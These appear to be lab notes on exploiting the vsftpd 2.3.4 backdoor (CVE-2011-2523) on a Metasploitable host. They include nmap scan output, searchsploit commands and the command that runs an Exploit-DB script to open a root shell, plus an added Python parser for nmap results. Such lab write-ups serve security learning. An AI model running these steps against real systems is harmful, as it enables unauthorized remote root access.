Vsftp4 attack
Attacker
Scan
- nmap -sV --script vuln 10.0.10.105 -p 21
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-27 19:27 CEST
Nmap scan report for metaspoitable.hack.lab (10.0.10.105)
Host is up (0.00088s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
| ftp-vsftpd-backdoor:
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|     IDs:  BID:48539  CVE:CVE-2011-2523
|       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
|     Disclosure date: 2011-07-03
|     Exploit results:
|       Shell command: id
|       Results: uid=0(root) gid=0(root)
|     References:
|       https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
|       https://www.securityfocus.com/bid/48539
|_      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
MAC Address: 0C:67:68:58:00:00 (Unknown)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.68 seconds
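For triaging scan results like the one above across many hosts, the following added example (not part of the original page) pulls every NSE script block whose state is VULNERABLE out of Nmap's normal text output, together with host, port, service version and CVE IDs. The function name `vulnerable_findings` and the shortened sample are assumptions made for this illustration.

```python
import re

# Constructed sample: shortened copy of the scan output shown above.
SAMPLE = """\
Nmap scan report for metaspoitable.hack.lab (10.0.10.105)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
| ftp-vsftpd-backdoor:
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|     IDs:  BID:48539  CVE:CVE-2011-2523
|_      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
"""

HOST = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9a-fA-F.:]+)\)?$")
PORT = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
SCRIPT = re.compile(r"^\|[ _]([A-Za-z0-9_-]+):\s*$")   # "| script-name:"
STATE = re.compile(r"^\|[ _]\s+State:\s*(.+)$")
CVE = re.compile(r"CVE-\d{4}-\d{4,}")

def vulnerable_findings(text):
    """Return one dict per NSE script block that reports a VULNERABLE state."""
    findings, host, port, cur = [], None, None, None
    for line in text.splitlines():
        line = line.rstrip()
        if m := HOST.match(line):
            host, port, cur = m.group(1), None, None
        elif m := PORT.match(line):
            port = {"port": int(m.group(1)), "proto": m.group(2),
                    "service": m.group(3), "version": m.group(4).strip()}
            cur = None
        elif m := SCRIPT.match(line):
            cur = {"host": host, **(port or {}), "script": m.group(1),
                   "state": None, "cves": []}
        elif cur is not None and line.startswith("|"):
            if m := STATE.match(line):
                cur["state"] = m.group(1)
                # "NOT VULNERABLE" and "LIKELY VULNERABLE" are skipped here.
                if cur["state"].startswith("VULNERABLE"):
                    findings.append(cur)
            for cve in CVE.findall(line):
                if cve not in cur["cves"]:
                    cur["cves"].append(cve)
    return findings

if __name__ == "__main__":
    for finding in vulnerable_findings(SAMPLE):
        print(finding)
```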
Searchsploit
- searchsploit vsftpd 2.3.4
- searchsploit -m 49757 unix/remote/49757.py
Google for the exploit
- CVE-2011-2523 exploit-db
Find the exploit
Run the exploit
Try several times
- python3 49757.py 10.0.10.105
Success, shell opened
Send `exit` to quit shell